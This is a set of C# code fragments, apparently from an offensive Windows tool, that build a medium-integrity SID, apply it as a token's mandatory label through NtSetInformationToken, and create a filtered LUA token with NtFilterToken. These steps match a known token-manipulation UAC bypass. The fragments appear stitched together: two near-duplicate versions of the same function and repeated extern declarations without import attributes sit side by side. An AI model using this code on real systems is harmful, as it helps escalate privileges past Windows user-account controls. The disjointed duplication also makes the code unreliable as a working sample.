////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private bool _SetTokenInformation()
{
Winnt._SID_IDENTIFIER_AUTHORITY pIdentifierAuthority = new Winnt._SID_IDENTIFIER_AUTHORITY
{
Value = new byte[] { 0x0, 0x0, 0x0, 0x0, 0x0, 0x10 } //16 - all
};
byte nSubAuthorityCount = 1;
IntPtr pSID = new IntPtr();
if (!advapi32.AllocateAndInitializeSid(ref pIdentifierAuthority, nSubAuthorityCount, 0x2000, 0, 0, 0, 0, 0, 0, 0, out pSID))
{
Misc.GetWin32Error("AllocateAndInitializeSid: ");
return(false);
}
Console.WriteLine(" [+] Initialized SID: 0x{0}", pSID.ToString("X4"));
Winnt._SID_AND_ATTRIBUTES sidAndAttributes = new Winnt._SID_AND_ATTRIBUTES
{
Sid = pSID,
Attributes = (uint)Winnt.SE_GROUP_INTEGRITY_32
};
try
{
Winnt._TOKEN_MANDATORY_LABEL tokenMandatoryLabel = new Winnt._TOKEN_MANDATORY_LABEL
{
Label = sidAndAttributes
};
int tokenMandatoryLableSize = Marshal.SizeOf(tokenMandatoryLabel);
if (0 != ntdll.NtSetInformationToken(phNewToken, 25, ref tokenMandatoryLabel, tokenMandatoryLableSize))
{
Misc.GetWin32Error("NtSetInformationToken: ");
return(false);
}
Console.WriteLine(" [+] Set Token Information On: 0x{0}", phNewToken.ToString("X4"));
if (0 != ntdll.NtFilterToken(phNewToken, 4, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref luaToken))
{
Misc.GetWin32Error("NtFilterToken: ");
return(false);
}
Console.WriteLine(" [+] LUA Token Handle: 0x{0}", luaToken.ToString("X4"));
}
catch (Exception ex)
{
Console.WriteLine("[-] {0}", ex.Message);
return(false);
}
finally
{
advapi32.FreeSid(pSID);
}
return(true);
}
public static extern bool AllocateAndInitializeSid(
ref Winnt._SID_IDENTIFIER_AUTHORITY pIdentifierAuthority,
byte nSubAuthorityCount,
int dwSubAuthority0,
int dwSubAuthority1,
int dwSubAuthority2,
int dwSubAuthority3,
int dwSubAuthority4,
int dwSubAuthority5,
int dwSubAuthority6,
int dwSubAuthority7,
out IntPtr pSid
);
public static extern Boolean AllocateAndInitializeSid(
ref Winnt._SID_IDENTIFIER_AUTHORITY pIdentifierAuthority,
byte nSubAuthorityCount,
Int32 dwSubAuthority0,
Int32 dwSubAuthority1,
Int32 dwSubAuthority2,
Int32 dwSubAuthority3,
Int32 dwSubAuthority4,
Int32 dwSubAuthority5,
Int32 dwSubAuthority6,
Int32 dwSubAuthority7,
out IntPtr pSid
);
////////////////////////////////////////////////////////////////////////////////
// Wrapper for AllocateAndInitializeSid - Hardest Possible way of doing it
////////////////////////////////////////////////////////////////////////////////
private static bool InitializeSid(Winnt._SID_IDENTIFIER_AUTHORITY authority, uint[] subAuthority, ref IntPtr psid)
{
//Console.WriteLine("AllocateAndInitializeSid");
bool retVal = advapi32.AllocateAndInitializeSid(
ref authority,
1,
subAuthority[0],
subAuthority[1],
subAuthority[2],
subAuthority[3],
subAuthority[4],
subAuthority[5],
subAuthority[6],
subAuthority[7],
out psid);
if (!retVal)
{
Misc.GetWin32Error("AllocateAndInitializeSid");
return(false);
}
IntPtr hStringUserSid = IntPtr.Zero;
advapi32.ConvertSidToStringSid(psid, ref hStringUserSid);
string sddl = Marshal.PtrToStringAuto(hStringUserSid);
string accountName = string.Empty;
try
{
accountName = new System.Security.Principal.SecurityIdentifier(sddl)
.Translate(typeof(System.Security.Principal.NTAccount)).ToString();
}
catch (System.Security.Principal.IdentityNotMappedException ex)
{
Console.WriteLine(ex.Message);
}
Console.WriteLine(" - " + accountName + " " + sddl);
return(true);
}
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
public Boolean SetTokenInformation()
{
Winnt._SID_IDENTIFIER_AUTHORITY pIdentifierAuthority = new Winnt._SID_IDENTIFIER_AUTHORITY();
pIdentifierAuthority.Value = new byte[] { 0x0, 0x0, 0x0, 0x0, 0x0, 0x10 }; //16 - all
Byte nSubAuthorityCount = 1;
IntPtr pSID = new IntPtr();
if (!advapi32.AllocateAndInitializeSid(ref pIdentifierAuthority, nSubAuthorityCount, 0x2000, 0, 0, 0, 0, 0, 0, 0, out pSID))
{
GetWin32Error("AllocateAndInitializeSid: ");
return(false);
}
Console.WriteLine(" [+] Initialized SID: {0}", pSID.ToInt32());
Winnt._SID_AND_ATTRIBUTES sidAndAttributes = new Winnt._SID_AND_ATTRIBUTES();
sidAndAttributes.Sid = pSID;
sidAndAttributes.Attributes = Constants.SE_GROUP_INTEGRITY_32;
Winnt._TOKEN_MANDATORY_LABEL tokenMandatoryLabel = new Winnt._TOKEN_MANDATORY_LABEL();
tokenMandatoryLabel.Label = sidAndAttributes;
Int32 tokenMandatoryLableSize = Marshal.SizeOf(tokenMandatoryLabel);
if (0 != ntdll.NtSetInformationToken(phNewToken, 25, ref tokenMandatoryLabel, tokenMandatoryLableSize))
{
GetWin32Error("NtSetInformationToken: ");
return(false);
}
Console.WriteLine(" [+] Set Token Information : {0}", phNewToken.ToInt32());
if (0 != ntdll.NtFilterToken(phNewToken, 4, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref luaToken))
{
GetWin32Error("NtFilterToken: ");
return(false);
}
Console.WriteLine(" [+] Set LUA Token Information : {0}", luaToken.ToInt32());
advapi32.FreeSid(pSID);
return(true);
}
